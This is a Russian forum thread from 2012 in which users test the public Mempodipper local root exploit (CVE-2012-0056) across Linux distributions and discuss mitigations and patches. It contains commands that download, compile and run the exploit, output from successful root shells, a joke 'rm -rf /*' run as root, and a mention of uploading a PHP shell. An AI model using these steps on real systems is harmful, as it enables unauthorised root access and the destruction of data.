> А остальные чем принципиально лучше/хуже? У них дырки чтоли персональные? :)

Нет, это у убунты персональные дырки. Потому что ее "разработчикам" лень проверять патчи, которые они применяют.

Ответить | Правка | ^ к родителю #192 | Наверх | Cообщить модератору

235. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 07-Фев-12, 16:33 
> Нет, это у убунты персональные дырки. Потому что ее "разработчикам" лень проверять
> патчи, которые они применяют.

А остальные как обрулили проблему озвученную в рассылке?

Ответить | Правка | ^ к родителю #202 | Наверх | Cообщить модератору

51. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от filosofem (ok) on 23-Янв-12, 18:28 
>Неужели и в наш век в сети можно найти сервис где локальные учетки раздают?

Не обязательно. На вэб-хостинг к примеру достаточно php-shell заалоадить.

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

63. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 19:02 
Вариант вывалится из под контроля процесса под его привелегии я понимаю. Но спрашивал я именно про локальные учетки. Почему-то мне думается что уже повсюду контейнеры ..
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

69. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok) on 23-Янв-12, 19:13 
> Почему-то мне думается что уже повсюду контейнеры ..

Shared hosting действительно у многих перемещается в контейнеры, но внутри них по-прежнему создаются сотни аккаунтов, в том числе с SSH-доступом. (Правда, у нас там нет ни одной доступной пользователю SUID root программы - контейнеры под shared hosting создаем на основе Owl.) Создавать по контейнеру на каждого клиента shared hosting'а непрактично.

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

72. "В ядре Linux найдена локальная root-уязвимость"  –2 +/
Сообщение от Аноним (??) on 23-Янв-12, 19:19 
Далеко не все используют контейнеры для затыкания рутовых зеро-дэй, которые ожидаются by design. Равно как и далеко не все используют контейнеры для дозагрузки простаивающих многоядерников. Не у всех они простаивают и не всем нужно аргументированно дозагрузить камни и получить обоснование для покупки нового харда/откатов.
Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

82. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от Michael Shigorin email(ok) on 23-Янв-12, 20:20 
> Далеко не все

...и пусть их.

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

161. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от Аноним (??) on 24-Янв-12, 15:38 
> Равно как и далеко не все используют контейнеры для дозагрузки
> простаивающих многоядерников. Не у всех они простаивают и не всем нужно
> аргументированно дозагрузить камни и получить обоснование для покупки нового харда/откатов.

Не знаю как у вас, а у нас в линуксе оверхед от контейнеров (lxc) практически нулевой.
Процесс из контейнера отличается от процесса хоста только идентификаторами пространств имен.

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

193. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:12 
> Далеко не все используют контейнеры для затыкания рутовых зеро-дэй, которые ожидаются by
> design. Равно как и далеко не все используют контейнеры для дозагрузки
> простаивающих многоядерников.

Нагрузка от LXC контейнеров практически по нулям (ну может пару процентов отличие, без микроскопа фиг заметишь). А разграничение довольно неплохое. Там и список процессов будет свой, и сетка и что там еще. И рут в LXC, если надо, может быть "фэйковым", лишенным прав везде кроме своего загончика. Так что если его даже и получат - не так уж и страшно.

Telepath mode: а вы наверное бсдшник и хотели сказать "у нас этого нет, поэтому оно не нyжно".

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

203. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от коксюзер on 25-Янв-12, 02:06 
> И рут в LXC, если надо, может быть "фэйковым", лишенным прав везде кроме

На данный момент разве что при условии монтирования /proc в режиме ro. И не с помощью родных утилит LXC, которым требуется CAP_SYS_MOUNT внутри контейнера.

> Telepath mode: а вы наверное бсдшник и хотели сказать "у нас этого
> нет, поэтому оно не нyжно".

Во FreeBSD давно есть jails.

Ответить | Правка | ^ к родителю #193 | Наверх | Cообщить модератору

211. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 04:14 
> Нагрузка от LXC контейнеров практически по нулям (ну может пару процентов отличие,
> без микроскопа фиг заметишь). А разграничение довольно неплохое. Там и список
> процессов будет свой, и сетка и что там еще. И рут
> в LXC, если надо, может быть "фэйковым", лишенным прав везде кроме
> своего загончика. Так что если его даже и получат - не
> так уж и страшно.

О великий аноним, может ты дашь мне доступ к своему контейнеру на не обновленном ядре?

Ответить | Правка | ^ к родителю #193 | Наверх | Cообщить модератору

236. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 07-Фев-12, 16:35 
> Далеко не все используют контейнеры для затыкания рутовых зеро-дэй

Тогда пусть не обижаются потом крутым руткитам и тому факту что их ресурсы использовали нашару.

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

45. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от Buy email(??) on 23-Янв-12, 18:14 
Ubuntu 11.10. Работает.
.............

[+] Calculating su padding.
[+] Seeking to offset 0x4021cc.
[+] Executing su with shellcode.
#
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),115(lpadmin),117(admin),122(sambashare)
# rm -rf /*

:)))

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

54. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от anonymous (??) on 23-Янв-12, 18:41 
debian testing тоже работает
Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

106. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 23:33 
> # rm -rf /*
> :)))

--no-preserve-root забыли.

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

159. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 15:34 
Со звездочкой - необязательно, preserve-root все равно не работает.
Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

50. "В ядре Linux найдена локальная root-уязвимость"  –5 +/
Сообщение от ALex_hha (ok) on 23-Янв-12, 18:28 
$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
$ gcc -o mempodipper mempodipper.c
$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19890/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e62.
[+] Executing su with shellcode.

$ whoami
test

$ id
uid=500(test) gid=501(test) groups=501(test)

ЧЯДНТ?

$ cat /etc/redhat-release
CentOS release 6.2 (Final)

$ uname -r
2.6.32-220.2.1.el6.x86_64

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

62. "В ядре Linux найдена локальная root-уязвимость"  –3 +/
Сообщение от XPEH email on 23-Янв-12, 18:58 
> ЧЯДНТ?

Читать не умеете: во всех ядрах 2.6.39 и выше

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

71. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok) on 23-Янв-12, 19:18 
... и в RHEL 6 начиная с 2.6.32-220.el6, согласно Red Hat'у. Так что CentOS 6 с этой версией ядра должен быть уязвим. Но там могут быть другие отличия, ломающие конкретный эксплойт.
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

65. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok) on 23-Янв-12, 19:05 
Это немного странно, хотя не-работа конкретного эксплойта мало что значит. Если разбираться, я бы начал с проверки наличия mem_write с помощью вот этой тестовой программки: https://bugzilla.redhat.com/attachment.cgi?id=556461
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

165. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok) on 24-Янв-12, 15:52 
Как многие уже догадались, на RHEL 6 и некоторых других системах, где опубликованные эксплойты как-бы не работают, дело в ASLR и PIE. Для успешной атаки потребуется другая SUID/SGID-программа (собранная не как PIE, но тоже выводящая что-то подходящее в stdout или stderr) или обход ASLR (много запусков) или выключенный ASLR. Ядро обновлять нужно - и как можно скорее.

http://www.openwall.com/lists/oss-security/2012/01/24/2

"On Red Hat Enterprise Linux 6, /bin/su (coreutils) and /usr/bin/gpasswd (shadow-utils) are protected at compile time by PIE."

https://access.redhat.com/kb/docs/DOC-69129

"2012-01-24: Article updated to reflect the release of the Red Hat Security Advisory RHSA-2012:0052, which fixes the CVE-2012-0056 flaw for Red Hat Enterprise Linux 6. The article was also updated to provide more information about generating a SystemTap kernel module for other computers, and to clarify that the publicly-circulated exploits do not affect Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG at the time of writing."

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

55. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от ILYA INDIGO (ok) on 23-Янв-12, 18:43 
ilya@ILYA:/tmp> uname -a
Linux ILYA 3.2.1-3-desktop #1 SMP PREEMPT Fri Jan 13 10:38:45 UTC 2012 (2eca2bf) x86_64 x86_64 x86_64 GNU/Linux
ilya@ILYA:/tmp> gcc ./a.c -o c
ilya@ILYA:/tmp> ./c
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/30336/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x25e0.
[+] Calculating su padding.
[+] Seeking to offset 0x25be.
[+] Executing su with shellcode.
ilya@ILYA:/tmp> whoami
ilya

Это я что то не так делаю, или в openSUSE этого бага нету?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

61. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от ILYA INDIGO (ok) on 23-Янв-12, 18:57 
Таки в openSUSE этот эксплоит НЕ пашет :)
Конечно при постоянном обновлении, хотя последний раз обновлялся 21-ого.
Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

66. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok) on 23-Янв-12, 19:06 
> Таки в openSUSE этот эксплоит НЕ пашет :)

...что ничего не означает о наличии или отсутствии этой уязвимости. :-)

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

80. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от ILYA INDIGO (ok) on 23-Янв-12, 20:04 
Я и не спорю, про уязвимость в целом, но констатирую отдельный факт.
Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

108. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Sergey (??) on 23-Янв-12, 23:38 
Да, у меня тоже в OpenSuSe не пашет
Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

58. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от Аноним (??) on 23-Янв-12, 18:48 
Debian wheezy/sid : работает.
3.2.0-1-amd64 #1 SMP Thu Jan 19 09:46:46 UTC 2012 x86_64 GNU/Linux

$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/13591/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f9c.
[+] Executing su with shellcode.
# whoami
root

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

64. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 19:04 
В Debian Squeeze обновленного из backports с ядром 2.6.39 норм запустился.
А в OpenSuSE 12.1 с ядром 3.1 молча весь вывод пробегает, но su терминал не предоставляет... Печаль :-(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

67. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 19:08 
Вопрос походу отпал.
Они 5 января уязвимость пофиксили вроде как. И хотя я еще не разу её не обновил, но скачал DVD и устанавливал около 15числа.
Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

68. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 19:11 
3.3-rc1 - не работает :)

> ./a.out              

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6675/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401dd0.
[+] Calculating su padding.
[+] Seeking to offset 0x401dc2.
[+] Executing su with shellcode.
> whoami

vizor

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

70. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от имя on 23-Янв-12, 19:15 
web ? )
Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

78. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 19:57 
bash-4.1$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1864/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./a.out -o ADDRESS
[-] Example: ./a.out -o 0x402178
bash-4.1$ su
Password:
bash-4.1# objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'
0x8049648
bash-4.1# exit
exit
bash-4.1$ ./a.out -o 0x8049648
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1878/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x804963c.
[+] Executing su with shellcode.
bash-4.1$ whoami
user
bash-4.1$ uname -a
Linux localhost 3.2.1-diamond-ironic #5 Wed Jan 18 16:07:15 GMT+3 2012 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GenuineIntel GNU/Linux

Опять придется перезагружаться если Пароль забуду :(

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

81. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Денис (??) on 23-Янв-12, 20:07 
[user0@homelinux test]$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1816/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x80493d0.
[+] Calculating su padding.
[+] Seeking to offset 0x80493ae.
[+] Executing su with shellcode.
Ошибка сегментирования
[user0@homelinux test]$
Linux homelinux 3.2.1-1-ARCH

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

194. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:14 
> Ошибка сегментирования

В арче даже сплойты работают с багами :)

Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

83. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Злыдень (??) on 23-Янв-12, 20:38 
> Дополнение 3: Вышло обновление с устранением уязвимости для Ubuntu 11.10.

Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

127. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 09:18 
В Арче тоже уже доступно.
Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

162. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от Аноним (??) on 24-Янв-12, 15:41 
> Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.

Но зато оно не будет содержать новую уязвимость, в отличие от :)

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

195. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:15 
> Но зато оно не будет содержать новую уязвимость, в отличие от :)

Что за новая уязвимость? Откуда дровишки?

Ответить | Правка | ^ к родителю #162 | Наверх | Cообщить модератору

86. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от meequz (ok) on 23-Янв-12, 20:53 
В Mandriva 2011 не работает. Ни 38 ядром, ни с 39.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

93. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 21:47 
Странно:

glsa-check -t all
This system is not affected by any of the listed GLSAs

uname -r
3.2.1-gentoo

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

118. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от I am (??) on 24-Янв-12, 02:31 
> Странно:
> glsa-check -t all
> This system is not affected by any of the listed GLSAs
> uname -r
> 3.2.1-gentoo

На ядра GLSA не публикуют.

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

94. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 21:54 
Linux da_desktop 3.1.9-1.fc16.i686.PAE #1 SMP Fri Jan 13 16:57:54 UTC 2012 i686 i686 i386 GNU/Linux

{den@da_desktop}-> ~ $gcc -o rk rk.c
{den@da_desktop}-> ~ $./rk
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4470/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1524.
[+] Calculating su padding.
[+] Seeking to offset 0x1516.
[+] Executing su with shellcode.
{den@da_desktop}-> ~ $whoami
den

Не работает.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

98. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 22:47 
в aptosid ещё 20 числа выпустили апдейт
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

100. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 22:58 
RHEL 6.1 - не работает
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

101. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 23-Янв-12, 23:06 
Трижды попробовал. ЧЯДНТ? :(

[dAverk@dAverk ~]$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7121/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x21a8.
[+] Calculating su padding.
[+] Seeking to offset 0x2186.
[+] Executing su with shellcode.
[dAverk@dAverk ~]$ whoami
dAverk
[dAverk@dAverk ~]$ uname -a
Linux dAverk.4820TG 3.1.7-1.fc16.x86_64 #1 SMP Tue Jan 3 19:45:05 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[dAverk@dAverk ~]$ cat /etc/redhat-release
RFRemix release 16 (Verne)
[dAverk@dAverk ~]$ id
uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

102. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от dAverk email(??) on 23-Янв-12, 23:08 
Ща ещё обновимся до 3.1.9 и заодно на 6м центе и дебах 5/6 посмотрим-с
Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

104. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 23-Янв-12, 23:25 
> Ща ещё обновимся до 3.1.9 и заодно на 6м центе и дебах
> 5/6 посмотрим-с

на 3.1.9 тоже не завелось

[dAverk@dAverk ~]$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4219/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x21a8.
[+] Calculating su padding.
[+] Seeking to offset 0x2186.
[+] Executing su with shellcode.
[dAverk@dAverk ~]$ id
uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk)
[dAverk@dAverk ~]$ whoami
dAverk
[dAverk@dAverk ~]$ cat /etc/redhat-release
RFRemix release 16 (Verne)
[dAverk@dAverk ~]$ uname -a
Linux dAverk.4820TG 3.1.9-1.fc16.x86_64 #1 SMP Fri Jan 13 16:37:42 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

109. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 23-Янв-12, 23:46 
на 5м дебе старое ядро, на 6м работает.
На 6й центе даже gcc отродясь не было, но ради такого я даже поставил, но нихчего

[admin@samba ~]$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9249/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e4e.
[+] Executing su with shellcode.
[admin@samba ~]$ id
uid=506(admin) gid=506(admin) группы=506(admin)
[admin@samba ~]$ whoami
admin
[admin@samba ~]$ cat /etc/redhat-release
CentOS release 6.2 (Final)
[admin@samba ~]$ uname -a
Linux samba.unesko 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64 x86_64 x86_64 GNU/Linux

кстати в какой репе 2.6.32-220 ядро? у меня не находит обновления :(

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

134. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 24-Янв-12, 10:11 
на 2.6.32-220 Centos 6 Не заработало
[admin@samba ~]$ uname -a
Linux samba.unesko 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

148. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 12:42 
> на 5м дебе старое ядро, на 6м работает.

Ты что-то попутал. В squeeze 2.6.32

Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

158. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 24-Янв-12, 15:23 
>> на 5м дебе старое ядро, на 6м работает.
> Ты что-то попутал. В squeeze 2.6.32

Каюсь - чёрт меня попутал. На тестовой машине смотрел, а у меня там из wheezy ядрышко :)

Ответить | Правка | ^ к родителю #148 | Наверх | Cообщить модератору

107. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от Гентушник (ok) on 23-Янв-12, 23:34 
На Gentoo 3.1.5-hardened x86_64 не работает.
Даже chmod a+r /bin/su не помогает.
Вот так всегда :(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

110. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Гентушник (ok) on 23-Янв-12, 23:54 
test@naodesu ~/CVE-2012-0056 $ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/31729/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x2a90.
[+] Calculating su padding.
[+] Seeking to offset 0x2a84.
[+] Executing su with shellcode.
test@naodesu ~/CVE-2012-0056 $ id
uid=1003(test) gid=1003(test) groups=1003(test)
test@naodesu ~/CVE-2012-0056 $ cat /etc/shadow
cat: /etc/shadow: Permission denied

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

113. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 23-Янв-12, 23:59 
хм.

uname -a
Linux 3.1.5 #2 SMP Sat Dec 10 22:58:40 EET 2011 i686 Intel(R) Core(TM)2 Duo CPU     E8400  @ 3.00GHz GenuineIntel GNU/Linux

./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10462/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./mempodipper -o ADDRESS
[-] Example: ./mempodipper -o 0x402178

не работает. %-(

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

115. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 24-Янв-12, 00:04 
после objdump и указания адреса — тоже. пичалька.
Ответить | Правка | ^ к родителю #113 | Наверх | Cообщить модератору

124. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от reinhard (ok) on 24-Янв-12, 07:20 
bash-4.2$ uname -a
Linux spring.bit.ab.ru 2.6.41.1-1.fc15.i686 #1 SMP Fri Nov 11 21:50:36 UTC 2011 i686 i686 i386 GNU/Linux
bash-4.2$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2478/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1734.
[+] Calculating su padding.
[+] Seeking to offset 0x1726.
[+] Executing su with shellcode.
bash-4.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

125. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Флинт email on 24-Янв-12, 07:39 
[alexander@localhost ~]$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/5212/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1984.
[+] Calculating su padding.
[+] Seeking to offset 0x1962.
[+] Executing su with shellcode.
[alexander@localhost ~]$ whoami
alexander
[alexander@localhost ~]$ uname -r
2.6.39.4-5.1-desktop
[alexander@localhost ~]$

ROSA 2011 не работает! :)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

126. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от CHERTS (??) on 24-Янв-12, 08:19 
На Ubuntu 11.10 x86 с ядром 3.0.0 эксплоит работает
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

153. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 13:41 
> На Ubuntu 11.10 x86 с ядром 3.0.0 эксплоит работает

так уже апдейт вышел

Ответить | Правка | ^ к родителю #126 | Наверх | Cообщить модератору

163. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 15:49 
> так уже апдейт вышел

... с новой дырой в комплекте :)

Ответить | Правка | ^ к родителю #153 | Наверх | Cообщить модератору

128. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Ващенаглухо (ok) on 24-Янв-12, 09:26 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
